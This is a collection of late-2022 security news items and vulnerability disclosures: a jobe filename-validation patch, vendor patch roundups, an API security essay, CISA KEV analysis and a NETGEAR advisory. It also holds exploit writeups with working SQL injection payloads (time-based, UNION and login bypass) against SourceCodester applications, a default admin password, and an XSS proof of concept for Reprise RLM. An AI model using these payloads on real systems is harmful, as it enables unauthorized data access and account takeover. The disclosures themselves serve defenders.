A vulnerability has been found in trampgeek jobe up to 1.6.4 and classified as problematic. This vulnerability affects the function runs_post of the file application/controllers/Restapi.php. The manipulation of the argument sourcefilename leads to an unknown weakness. Upgrading to version 1.6.5 is able to address this issue. The name of the patch is 694da5013dbecc8d30dd83e2a83e78faadf93771. It is recommended to upgrade the affected component. VDB-217174 is the identifier assigned to this vulnerability.

@@ -149,10 +149,12 @@ public function runs\_post() {

$this\->error('runs\_post: missing or invalid run\_spec parameter', 400);

}

if (!is\_array($run) || !isset($run\['sourcecode'\]) ||

!isset($run\['language\_id'\])

) {

!isset($run\['language\_id'\]) ) {

$this\->error('runs\_post: invalid run specification', 400);

}

if (isset($run\->sourcefilename) && !self::is\_valid\_source\_filename($run\->sourcefilename)) {

$this\->error('runs\_post: invalid sourcefilename');

}

  

// REST\_Controller has called to\_array on the JSON decoded

// object, so we must first turn it back into an object.

@@ -273,6 +275,24 @@ public function languages\_get()

// \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

// Support functions

// \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

  

// Return true unless the given filename looks dangerous, e.g. has '/' or '..'

// substrings. Uses code from https://stackoverflow.com/questions/2021624/string-sanitizer-for-filename

private function is\_valid\_source\_filename($filename) {

$sanitised = preg\_replace(

'~

\[<>:"/\\\\|?\*\]| # file system reserved https://en.wikipedia.org/wiki/Filename#Reserved\_characters\_and\_words

\[\\x00-\\x1F\]| # control characters http://msdn.microsoft.com/en-us/library/windows/desktop/aa365247%28v=vs.85%29.aspx

\[\\x7F\\xA0\\xAD\]| # non-printing characters DEL, NO-BREAK SPACE, SOFT HYPHEN

\[#\\\[\\\]@!$&\\'()+,;=\]| # URI reserved https://tools.ietf.org/html/rfc3986#section-2.2

\[{}^\\~\`\] # URL unsafe characters https://www.ietf.org/rfc/rfc1738.txt

~x',

'-', $filename);

// Avoid ".", ".." or ".hiddenFiles"

$sanitised = ltrim($sanitised, '.-');

return $sanitised === $filename;

}

  

private function is\_valid\_filespec($file) {

return (count($file) == 2 || count($file) == 3) &&

is\_string($file\[0\]) &&

CVE-2021-4297: Prevent privilege escalation attacks via sourcefilename [issue #46](h… · trampgeek/jobe@694da50

Plus: Patches for Apple iOS 16, Google Chrome, Windows 10, and more.

The holiday season is almost over, but security patches are still continuing to arrive thick and fast in December. The month has seen updates released by Apple, Google, and Microsoft, as well as enterprise software companies including the likes of SAP, Citrix, and VMWare. 

Many of the patches fix zero-day vulnerabilities already being exploited in attacks, making it important that they are applied as soon as possible. Here’s the lowdown on all the patches released in December.

Apple iOS and iPadOS 16.2, iOS 15.7.2, iOS 16.1.2

Apple released a major point upgrade to its iOS 16 operating system in December: iOS 16.2. The update comes with features including end-to-end encryption in iCloud, but it also fixes 35 security vulnerabilities.

None of the issues patched in iOS 16.2 are known to have been used in attacks; however, many are pretty serious. The flaws include six in the Kernel and nine in the engine that powers Apple’s Safari browser, WebKit, which could allow an attacker to execute code. 

Apple also released iOS 15.7.2 for users of older iPhones that can’t run iOS 16, fixing a flaw already being used in attacks. Tracked as CVE-2022-42856, the WebKit vulnerability could allow an attacker to execute code, according to Apple’s support page. At the end of November, Apple fixed the same WebKit flaw in iOS 16.1.2.

Since the launch of iOS 16 in September, Apple has been offering security updates to those who don’t want to upgrade to the new operating system. But iOS 15.7.2 is only for older iPhones, so if you’ve got an iPhone 8 or above, you now need to upgrade to iOS 16 to stay secure. 

The iPhone maker also released macOS Ventura 13.1, watchOS 9.2, tvOS 16.2, macOS Big Sur 11.7.2, macOS Monterey 12.6.2, and Safari 16.2.

Google Android 

December was a hefty patch month for Google’s Android operating system, with fixes for dozens of security vulnerabilities issued during the month. Tracked as CVE-2022-20411, the most severe is a critical vulnerability in the System component that could lead to remote code execution over Bluetooth with no additional execution privileges needed, Google said in a security bulletin. 

Google also fixed two critical flaws in the Android Framework component, CVE-2022-20472 and CVE-2022-20473. Meanwhile, 151 Pixel-specific bugs were patched by Google in December. 

The December patch is available for Google’s own Pixel devices as well as Samsung smartphones, including the hardware maker’s flagship Galaxy range. 

Google Chrome 108

Google has issued an emergency update for its Chrome browser to fix the ninth zero-day vulnerability of the year. Tracked as CVE-2022-4262, the high-severity type confusion issue in Chrome’s V8 JavaScript engine could allow a remote attacker to exploit heap corruption via a crafted HTML page. “Google is aware that an exploit for CVE-2022-4262 exists in the wild,” the browser maker said in a blog.

The emergency update arrived just days after Google released Chrome 108, patching 28 security flaws. Among the fixes are CVE-2022-4174—a type confusion flaw in V8—and several use-after-free bugs. None of these vulnerabilities have been exploited in attacks, according to Google. But given that the latest bug is already in the hands of attackers, it’s a good idea to update Chrome as soon as possible.

Microsoft Patch Tuesday 

Microsoft’s December Patch Tuesday was another big one, fixing 49 security vulnerabilities, including a flaw being used in attacks. Tracked as CVE-2022-44698, the issue is a Windows SmartScreen security feature bypass vulnerability that could lead to loss of integrity and availability.

“An attacker can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging,” Microsoft said.

Update Android Right Now to Fix a Scary Remote-Execution Flaw

NVIDIA GPU Display Driver for Windows contains a vulnerability where a regular user can cause an out-of-bounds read, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering.

CVE-2022-42267: Security Bulletin: NVIDIA GPU Display Driver - November 2022

There are a few reasons that the topic of API security has been popping up more and more as 2022 comes to a close.

Back in July 2021, Gartner predicted that by 2022, application programming interface (API) attacks will become the most frequent attack vector, causing data breaches for enterprise web applications.

Was the analyst firm right? It's too early to know for sure since OWASP is still tallying the results.

API attacks are back in the news. It turns out the likely ingress point for the Optus breach was a lowly REST API. And someone has leaked all of the data stolen from the Twitter breach — which also involved an API.

When we talk about API security, we're referring to the measures and practices that we use to secure APIs and the data they transmit. We might be worried about unauthorized access, adverse reaction to a DDoS (more than one API has fallen over and left the underlying system wide open and completely insecure), or other malicious attacks.

There's an art to securing APIs; a light touch and a delicate combination of technical and organizational skills are required to do it right.

On the technical side we’re looking at measures such as authentication and authorization, encryption, automated testing, and monitoring. On the organizational side, you need to know exactly who in the org chart the API was designed to serve, and tailor access accordingly. For external APIs, you need to know how much data should be available to the outside world, and how that data needs to be curated and presented.

**How Are APIs Protected?**

There's a sane order of operations when you're trying to secure your company's APIs.

First, find and catalog every API. The number of companies that actually do this and keep their API inventory up to date is small indeed. Developer convenience, rapid website development, and the increasing push towards federated services all contribute to mystery APIs popping up out of the blue without any kind of compulsory registration structure in place.

To avoid this kind of API creep, every single one of them should be registered centrally with the following information:

*   Name
*   Tools and packages used to build the API
*   Servers that it runs on
*   Services that rely on that API
*   Documentation of all valid uses and error codes
*   Typical performance metrics
*   Expected uptime or downtime windows

All of this information goes into a repository run by the cybersecurity team.

Second, set up security and performance automation for every API. This is why you asked for all of that information, and this is how you keep everything secure. Using the data provided by the developers (and DevOps team, the Web team, etc.), the cybersecurity and/or testing team can put together automation that tests the API regularly.

Functional tests are important because they make sure that everything is working as expected. Non-functional tests are important because they probe the reliability and security of the API. Remember that APIs must fail securely. It isn't enough to know that one has fallen over — you need to know the consequences of that failure.

Finally, add the API to the normal threat prevention suite. If any of the tools or packages used to build the API are found to be buggy, you need to know. If any of the protocols that it uses are deemed insecure when you do detect trouble, you need to have the team shut the APIs down until they can be examined and rebuilt.

Doing these things once is great; creating a programming and security culture that allows you to maintain fully cataloged and documented APIs is the long-term goal.

**Specific API Behaviors to Note**

When pen testing and securing an API, some techniques are more useful than others.

1.  **Start with behavioral analysis.** This tests whether or not the reality matches the documentation in terms of the level of access granted, the protocols and ports used, the results of successful and unsuccessful queries, and what happens to the system as a whole when the API itself stops functioning.
2.  **Next is service levels.** This involves the priority of the process itself on the server, rate limiting for transactional APIs, minimum and maximum request latency settings, and availability windows. Some of these details are important for DDoS prevention (or blunting). Others are useful to monitor whether there are any slow memory leaks or garbage collection issues that might be a long-term threat to the integrity of the server itself.
3.  **Authentication and sanitation issues** speak directly to the level of trust you have for the API's users. As you would with any service, queries need to be sanitized before they're accepted. This prevents code injection, buffer overflows, and the like.

There needs to be some level of authentication with APIs that are designed for a specific user base. However, this can get complex. Federation is one issue that you need to deal with, determining which central identification and authentication servers you'll accept. You might want to have two-factor authentication for particularly sensitive or powerful APIs. And of course authentication itself isn't necessarily a password these days; biometrics is a valid way to wall off an API. To make a long story short: Apply the standards that you find reasonable, and test the limitations that you've set on a regular basis.

Finally, encryption and digital signatures need to be part of the conversation. If it's on the Web, then we're talking about TLS at minimum (repeat the mantra: We don't REST without TLS!). Other interfaces also need encryption, so pick your protocols wisely. Remember that the static information, be it a database or a pool of files somewhere, also needs to be encrypted. No flat text files anywhere, no matter how "innocent"; salt and hash should be the standard. And checksums are a must when providing or receiving files that are known entities (size, contents, etc.).

Finally, key management can be difficult to get right. Don't expect every DevOps person to have perfect digital key implementation when a decent portion of the cybersecurity folks are half-assing it themselves. When in doubt, go back to the OWASP Cheat Sheet! That's what it's there for.

**Responding to an API Attack**

The cardinal rule is: If your API is going to fail, pinch off access. Under no circumstance should services fail in an open or accessible state. Remember to rate-limit and keep error messages short and generic. Don't worry about honey pots or API jails — worry about survival.

Custom-crafted API attacks on an individual basis need to be treated like any other breach attempt. Whether you caught the attempt yourself or via AI/ML analysis, follow your SOP. Don't cut corners because it's "just" an API.

API security separates the mediocre CISO who focuses solely on infrastructure from the masterful CISO who addresses actual business threats and ensures survivability. Create a system for API security, create reusable interface testing automation, and keep your API inventory up to date.

API Security Is the New Black

CISA’s Known Exploited Vulnerabilities Catalog has become a valuable repository of vulnerabilities to be patched. A pair of reports analyze the vulnerabilities under attack to understand the kind of threats organizations should be prioritizing.

Back in November 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) published the Known Exploited Vulnerabilities (KEV) Catalog to help federal agencies and critical infrastructure organizations identify and remediate vulnerabilities that are actively being exploited. CISA added 548 new vulnerabilities to the catalog across 58 updates from January to end of November 2022, according to Grey Noise in its first-ever "GreyNoise Mass Exploits Report."

Including the approximately 300 vulnerabilities added in November and December 2021, CISA listed approximately 850 vulnerabilities in the first year of the catalog's existence.

Actively exploited vulnerabilities in Microsoft, Adobe, Cisco, and Apple products accounted for over half of the updates to the KEV catalog in 2022, Grey Noise found. Seventy-seven percent of the updates to the KEV catalog were older vulnerabilities dating back to before 2022.

"Many were published in the previous two decades," noted Grey Noise's vice president of data science, Bob Rudis, in the report.

Several of the vulnerabilities in the KEV catalog are from products that have already entered end-of-life (EOL) and end-of-service-life (EOSL), according to an analysis by a team from Cyber Security Works. Even though Windows Server 2008 and Windows 7 are EOSL products, the KEV catalog lists 127 Server 2008 vulnerabilities and 117 Windows 7 vulnerabilities.

"The fact that they are a part of CISA KEV is quite telling as it indicates that many organizations are still using these legacy systems and therefore become easy targets for attackers," CSW wrote in its "Decoding the CISA KEV" report.

Even though the catalog was originally intended for critical infrastructure and public-sector organizations, it has become the authoritative source on which vulnerabilities are – or have been – exploited by attackers. This is key because the National Vulnerability Database (NVD) assigned Common Vulnerabilities and Exposures (CVE) identifiers for over 12,000 vulnerabilities in 2022, and it would be unwieldy for enterprise defenders to assess every single one to identify the ones relevant to their environments. Enterprise teams can use the catalog's curated list of CVEs under active attack to create their priority lists.

In fact, CSW found a bit of a delay between when a CVE Numbering Authority (CNA), such as Mozilla or MITRE, assigned a CVE to a vulnerability and when the vulnerability was added to the NVD. For example, a vulnerability in Apple WebKitGTK (CVE-2019-8720) received a CVE from Red Hat in October 2019 was added to the KEV catalog in March because it was being exploited by BitPaymer ransomware. It had not been added to the NVD as of early November (the cutoff date for CSW's report).

An organization relying on the NVD to prioritize patching would miss issues that are under active attack.

Thirty-six percent of the vulnerabilities in the catalog are remote code execution flaws and 22% are privilege execution flaws, CSW found. There were 208 vulnerabilities in CISA’s KEV Catalog associated with ransomware groups and 199 being used by APT groups, CSW found. There was an overlap, as well, where 104 vulnerabilities were being used by both ransomware and APT groups.

For instance, a medium-severity information disclosure vulnerability in Microsoft Silverlight (CVE-2013-3896) is associated with 39 ransomware groups, CSW said. The same analysis from CSW found that a critical buffer overflow vulnerability in the ListView/TreeView ActiveX controls used by Office documents (CVE-2012-0158) and a high-severity memory corruption issue in Microsoft Office (CVE-2017-11882) are being exploited by 23 APT groups, including most recently by the Thrip APT group (Lotus Blossom/BitterBug), in November 2022.

The spike in March 2022 is the result of Russia invading Ukraine in February – and the updates included many legacy vulnerabilities that nation-state actors had been known to exploit in businesses, governments, and critical infrastructure organizations, Grey Noise said. The vast majority – 94% – of the vulnerabilities added to the catalog in March were assigned a CVE before 2022.

CISA updates the KEV catalog only if the vulnerability is under active exploitation, has an assigned CVE, and there is clear guidance on how to remediate the issue. In 2022, enterprise defenders had to deal with an update to the KEV catalog on an almost weekly basis, with a new alert typically issued every four to seven days, Rudis wrote. The defenders were just as likely to have just a single day between updates, and the longest break defenders had in 2022 between updates was 17 days.

Adobe, Apple, Cisco, Microsoft Flaws Make Up Half of KEV Catalog

BDWeb-Link LMS version 1.11.5 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : BDWeb-Link Lms v1.11.5 SQL Injection Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              | | # Vendor    : https://bdweblink.com                                                                                              |  | # Dork      : Developed by Developed by BD Web Link                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/single-page.php?id=71 <====| inject here[+] https://127.0.0.1/Dashboard <====| LoginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

BDWeb-Link LMS 1.11.5 SQL Injection

A vulnerability, which was classified as critical, was found in SourceCodester Lead Management System 1.0. Affected is an unknown function of the file login.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-217020.

**Lead management system - login.php 'username' SQL inject****Exploit Title: Lead management system - login.php 'username' SQL inject****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15933/lead-management-system-php-open-source-free-download.html****Software Link:https://www.sourcecodester.com/php/15933/lead-management-system-php-open-source-free-download.html****Version: Lead management system 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Lead management system does not filter the content correctly at the "login.php /username" parameter, resulting in the generation of SQL injection.

**Payload used:**

    POST /login.php HTTP/1.1
    Host: 192.168.67.10:8091
    Content-Length: 97
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.67.10:8091
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.67.10:8091/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=g1diqn5ba9l5npktcpl5jc287t
    Connection: close
    
    username=1' AND (SELECT 6691 FROM (SELECT(SLEEP(5)))slLY) AND 'lrcD'='lrcD&password=123456&login=
    

**Proof of Concept**

1、Grab the package at the login and find that the login program is in login php

2、Looking at the source code, it is found that the password field is directly brought into the SQL statement query without filtering

3、Use payload "sleep (5)" for blind SQL injection.It is found that the time blind injection is successful

4、We can also construct a payload for universal password login

payload:username=1'or 1=1 #&password=123456&login=

4、Through testing with the tool, it is found that there are other injection methods such as blind SQL time injection.

CVE-2022-4855: webray.com.cn/leadmanasql.md at main · joinia/webray.com.cn

Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects RAX40 before 1.0.2.60, RAX35 before 1.0.2.60, R6400v2 before 1.0.4.122, R6700v3 before 1.0.4.122, R6900P before 1.3.3.152, R7000P before 1.3.3.152, R7000 before 1.0.11.136, R7960P before 1.4.4.94, and R8000P before 1.4.4.94.

Was this article helpful?   Yes     No | 5 people found this helpful in last 30 days

Associated CVE IDs: None

First published: 12/28/2022

NETGEAR has released fixes for a pre-authentication buffer overflow security vulnerability on the following product models:

*   RAX40 fixed in firmware version 1.0.2.60
*   RAX35 fixed in firmware version 1.0.2.60
*   R6400v2 fixed in firmware version 1.0.4.122
*   R6700v3 fixed in firmware version 1.0.4.122
*   R6900P fixed in firmware version 1.3.3.152
*   R7000P fixed in firmware version 1.3.3.152
*   R7000 fixed in firmware version 1.0.11.136
*   R7960P fixed in firmware version 1.4.4.94
*   R8000P fixed in firmware version 1.4.4.94

NETGEAR strongly recommends that you download the latest firmware as soon as possible.

**To download the latest firmware for your NETGEAR product:**

1.  Visit NETGEAR Support.
2.  Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears.  
    If you do not see a drop-down menu, make sure that you entered your model number correctly, or select a product category to browse for your product model.
3.  Click **Downloads**.
4.  Under **Current Versions**, select the download whose title begins with **Firmware Version**.
5.  Click **Download**.
6.  Follow the instructions in your product’s user manual, firmware release notes, or product support page to install the new firmware.

****Disclaimer****

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information in the document or materials linked from the document is at your own risk. NETGEAR reserves the right to change or update this document at any time. NETGEAR expects to update this document as new information becomes available.

The pre-authentication buffer overflow vulnerability remains if you do not complete all recommended steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification.

****Acknowledgements****

fr33rh

****Common Vulnerability Scoring System****

CVSS Rating: High

CVSS Score: 7.4

CVSS Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

****Best Practices for Updating Firmware****

We recommend that you keep your NETGEAR devices up to date with the latest firmware. Firmware updates contain security fixes, bug fixes, and new features for your NETGEAR products.

If your product is supported by one of our apps, using the app is the easiest way to update your firmware:

*   Orbi products: NETGEAR Orbi app
*   NETGEAR WiFi routers: NETGEAR Nighthawk app
*   Some NETGEAR Business products: NETGEAR Insight app (firmware updates through the app are available only for Insight subscribers)

If your product is not supported by one of our apps, you can always update your firmware manually by following the instructions in your product’s user manual, firmware release notes, or product support page. For more information, see Where can I find information about my NETGEAR product?.

****Contact****

We appreciate and value having security concerns brought to our attention. NETGEAR constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR.

It is NETGEAR's mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.

To report a security vulnerability, visit http://www.netgear.com/about/security/. 

If you are a NETGEAR customer with a security-related support concern, you can contact NETGEAR customer support at techsupport.security@netgear.com. 

****Revision History****

12/28/2022: Published advisory

Last Updated:12/29/2022 | Article ID: 000065495

**Was this article helpful?**Yes No

**This article applies to:**

*   Wireless AC Router Nighthawk (6)
    *   R6700v3
    *   R6900P
    *   R7000
    *   R7000P
    *   R7960P
    *   R8000P
*   Wireless AX Router Nighthawk (WiFi 6) (2)
    *   RAX35
    *   RAX40
*   Wireless AC Router (1)
    *   R6400v2

How to Find Your Model Number

**Looking for more about your product?**

Get information, documentation, videos and more for your specific product.

**Need to Contact NETGEAR Support?**

With NETGEAR’s round-the-clock premium support, help is just a phone call away.

**Complimentary Support**

NETGEAR provides complimentary technical support for NETGEAR products for 90 days from the original date of purchase.

Contact Support

**NETGEAR Premium Support**

**GearHead Support for Home Users**

GearHead Support is a technical support service for NETGEAR devices and all other connected devices in your home. Advanced remote support tools are used to fix issues on any of your devices. The service includes support for the following:

*   Desktop and Notebook PCs, Wired and Wireless Routers, Modems, Printers, Scanners, Fax Machines, USB devices and Sound Cards
*   Windows Operating Systems (2000, XP or Vista), MS Word, Excel, PowerPoint, Outlook and Adobe Acrobat
*   Anti-virus and Anti-Spyware: McAfee, Norton, AVG, eTrust and BitDefender

Learn More

**ProSUPPORT Services for Business Users**

NETGEAR ProSUPPORT services are available to supplement your technical support and warranty entitlements. NETGEAR offers a variety of ProSUPPORT services that allow you to access NETGEAR's expertise in a way that best meets your needs:

*   Product Installation
*   Professional Wireless Site Survey
*   Defective Drive Retention (DDR) Service

Learn More

CVE-2022-48196: Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2019-0208

SourceCodester Sanitization Management System 1.0 is vulnerable to SQL Injection.

**Sanitization Management System v1.0 has SQLI in /php-sms/admin/?page=inquiries/view\_inquiry**

Author: y1s3m0

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

**How to Run?****Requirements**

*   Download and Install any local web server such as XAMPP.
*   Download the provided source code zip file. (download button is located below)

**System Installation/Setup**

*   Enable the GD Library in your php.ini file.
*   Open your XAMPP Control Panel and start Apache and MySQL.
*   Extract the downloaded source code zip file.
*   Copy the extracted source code folder and paste it into the XAMPP's "htdocs" directory.
*   Browse the PHPMyAdmin in a browser. i.e. http://localhost/phpmyadmin
*   Create a new database named sms\_db.
*   Import the provided SQL file. The file is known as sms\_db.sql located inside the database folder.
*   Browse the Sanitization Management System in a browser. i.e. http://localhost/php-sms/.

**Admin Default Access:**

*   Username: admin
*   Password: admin123

**Payload**

database:sms\_db database\_user:root@localhost

\[+\] Payload: /php-sms/?p=admin/inquiries/view\_inquiry&id=99999999999999999' union select 1,2,database(),user(),5,6,7,8,9 --+ // Leak place ---> id

GET /php\-sms/?p\=admin/inquiries/view\_inquiry&id\=99999999999999999%27%20union%20select%201,2,database(),user(),5,6,7,8,9%20\--\+ HTTP/1.1
Host: phpcms:8081
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9,ja;q=0.8,vi;q=0.7
Cache-Control: no-cache
Cookie: PHPSESSID=ejfc8c9qlifbn82hovfq5nq74n
DNT: 1
Pragma: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36

CVE-2022-44137: vulnfind/sqli_view_inquiry.md at main · y1s3m0/vulnfind

XSS in signing form in Reprise Software RLM License Administration v14.2BL4 allows remote attacker to inject arbitrary code via password field.

\# Exploit Title: Cross-Site Scripting (XSS)

\# Detailed Description:

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

\# Exploit Author: Mohammed A.Siledar

\# Author Company : reprisesoftware

\# Version: rlm.v14.2BL4

\# Vendor home page : https://reprisesoftware.com

\# Software Link: https://www.reprisesoftware.com/license\_admin\_kits/rlm.v14.2BL4-x64\_w3.admin.exe

\# Authentication Required: No

\# CVE : CVE-2022-30519

\# Tested on: Windows 10

Impact:

Impact:

The impact of cross-site scripting vulnerabilities can vary from one web application to another. It ranges from session hijacking to credential theft and other security vulnerabilities. By exploiting a cross-site scripting vulnerability, an attacker can impersonate a legitimate user and take over their account.

If the victim user has administrative privileges, it might lead to severe damage such as modifications in code or databases to further weaken the security of the web application, depending on the rights of the account and the web application.

Here are some of the most common impacts of cross-site scripting attacks:

1\. Account Hijacking

2\. Credential Theft

3\. Data Leakage

\# Poc code

http://localhost/goform/login\_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E

Note: Vulnerability has been fixed by upgrading version of software.

Tag

#windows